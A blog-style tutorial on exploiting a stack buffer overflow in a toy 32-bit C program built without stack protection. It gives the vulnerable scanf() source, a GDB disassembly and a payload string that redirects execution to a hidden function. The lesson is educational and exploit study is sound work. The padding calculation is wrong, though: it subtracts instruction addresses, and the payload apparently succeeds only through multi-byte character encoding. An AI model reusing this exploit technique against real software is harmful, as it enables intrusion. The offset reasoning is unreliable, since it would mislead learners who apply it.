Exploiting a buffer overflow vulnerability

A common computer programming problem is when the size of a user’s input is not checked before coping it over into a limited memory buffer, this problem is commonly refered to as a buffer overflow vulnerability. This post shows how to exploit one for fun and profit.

Things you’ll need to follow along

If you want to follow along with this tutorial like blog post you will need the following: A Linux based operating system GCC, gcc-multitools package, GDB, Objdump, and Python3. Working knowledge of C, x86 Assembly (and how CPUs work), and being comfortable with the command line.

Our vulnerable program written in C

In our program we have a main() function which calls our function echo(), there’s also a function called secretFunction() that we don’t want our users to know about until the next release of the program, it has some placeholder code for the time being but is still a secret.

This program was compiled using GCC with the following flags: gcc -fno-stack-protector -m32 program.c, these flags produce a 32-bit binary without stack smashing protection.

If you’re unfamiliar with this functionality, GCC’s stack protector option is described as follows:

“Emit extra code to check for buffer overflows, such as stack smashing attacks. This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.”

This behavior is useful for preventing stack smashing attacks and is benefical to several projects which take advantage of it, however it makes showcasing a vulnerability more difficult and many real world projects disable it due to compatibility issues with other libraries anyways so the program is still resemblent of a real world program.

There is a dangerous flaw in how this program processes user input and uses the scanf() function in C’s standard library (What could possibly go wrong?).

Review the following C code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// program credit goes to David Kapil, check out his blog post https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/
#include<stdio.h>

void secretFunction()
{
printf("Congratulations!\n");
printf("You have entered in the secret function!\n");
}

void echo()
{
char buffer[20];

printf("Enter some text:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}

int main()
{
echo();

return 0;
}

The bug in our program

If you haven’t guessed by now, scanf() does not validiate the length of the input to the size of the buffer meaning that a user can enter too much data and overflow it’s allocated memory. Let’s take advantage of this to call another function.

Creating the payload

To create a payload, we need to determine the amount of necessary padding charaters and append a return address at the end. We do this by taking the address of the nearest return and substract it from the address of the next instruction after the input call.

If you’re unaware of this already, memory is addressed using hexadecimal numbers, base16, which can easily be converted into base10 numbers (0-9), or base2 (binary 0 and 1s). Likewise you can use memory addresses in arithmetic expressions.

Consider the follow disassembly dump by GDB:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
(gdb) disassemble echo
Dump of assembler code for function echo:
0x565561f5 <+0>: push ebp
0x565561f6 <+1>: mov ebp,esp
0x565561f8 <+3>: push ebx
0x565561f9 <+4>: sub esp,0x24
0x565561fc <+7>: call 0x565560c0 <__x86.get_pc_thunk.bx>
0x56556201 <+12>: add ebx,0x2dff
0x56556207 <+18>: sub esp,0xc
0x5655620a <+21>: lea eax,[ebx-0x1fbb]
0x56556210 <+27>: push eax
0x56556211 <+28>: call 0x56556040 <puts@plt>
0x56556216 <+33>: add esp,0x10
0x56556219 <+36>: sub esp,0x8
0x5655621c <+39>: lea eax,[ebp-0x1c]
0x5655621f <+42>: push eax
0x56556220 <+43>: lea eax,[ebx-0x1faa]
0x56556226 <+49>: push eax
0x56556227 <+50>: call 0x56556060 <__isoc99_scanf@plt>
0x5655622c <+55>: add esp,0x10
0x5655622f <+58>: sub esp,0x8
0x56556232 <+61>: lea eax,[ebp-0x1c]
0x56556235 <+64>: push eax
0x56556236 <+65>: lea eax,[ebx-0x1fa7]
0x5655623c <+71>: push eax
0x5655623d <+72>: call 0x56556030 <printf@plt>
0x56556242 <+77>: add esp,0x10
0x56556245 <+80>: nop
0x56556246 <+81>: mov ebx,DWORD PTR [ebp-0x4]
0x56556249 <+84>: leave
0x5655624a <+85>: ret
End of assembler dump.

To determine the amount of padding we need take, we can evalulate the following expression: 0x5655624a <+85>: ret (0x5655624a ~ 1448436298) - 0x5655622c <+55>: add esp,0x10 (0x5655622c ~ 1448436268) + 1 - char buf[20]; (buffer - 20) equaling 31 bytes of necessary padding. We represent this padding in our payload as aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.

We now need to add our return address to the end of the payload. We can use GDB to find it:

1
2
(gdb) info address secretFunction
Symbol "secretFunction" is at 0x565561b9 in a file compiled without debugging.

We can convert this address into a format used for our payload with Python3, we take last two bits from the address at a time on most Intel processors (little endian), b9 61 55 56, put each of those behind 0x, and let the Python interpreter do its magic.

1
2
3
4
5
6
7
8
>>> chr(0x56)
'V'
>>> chr(0x55)
'U'
>>> chr(0x61)
'a'
>>> chr(0xb9)
'¹'

This address is represented in our payload as ¹aUV for a final payload of aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa¹aUV. All characters after being entered are represented as a hexadecimal address, so when we change to our payload the characters ¹aUV in advertently reference the memory address which plays out in our favor.

If you have a big endian processor and are following along take a look at Wikipedia’s article on Endianness and see if you can figure out what you need to change.

Results

What happens when we run our payload? Check it out:

1
2
3
4
5
6
7
8
9
(gdb) run
Enter some text:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa¹aUV
You entered: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa¹aUV
Congratulations!
You have entered in the secret function!

Program received signal SIGSEGV, Segmentation fault.
0xf7fc2000 in ?? () from /lib32/libc.so.6

The program ran, accepted our input, the program’s vulnerability thanks to scanf() was exploited and we accessed the secretFunction(). Since we accessed the function through an exploit, without a more complex payload, the application will crash as a segmentation fault as the program has nowhere to return to, however at that point your task has been accomplished and the crash is no longer relevent to you.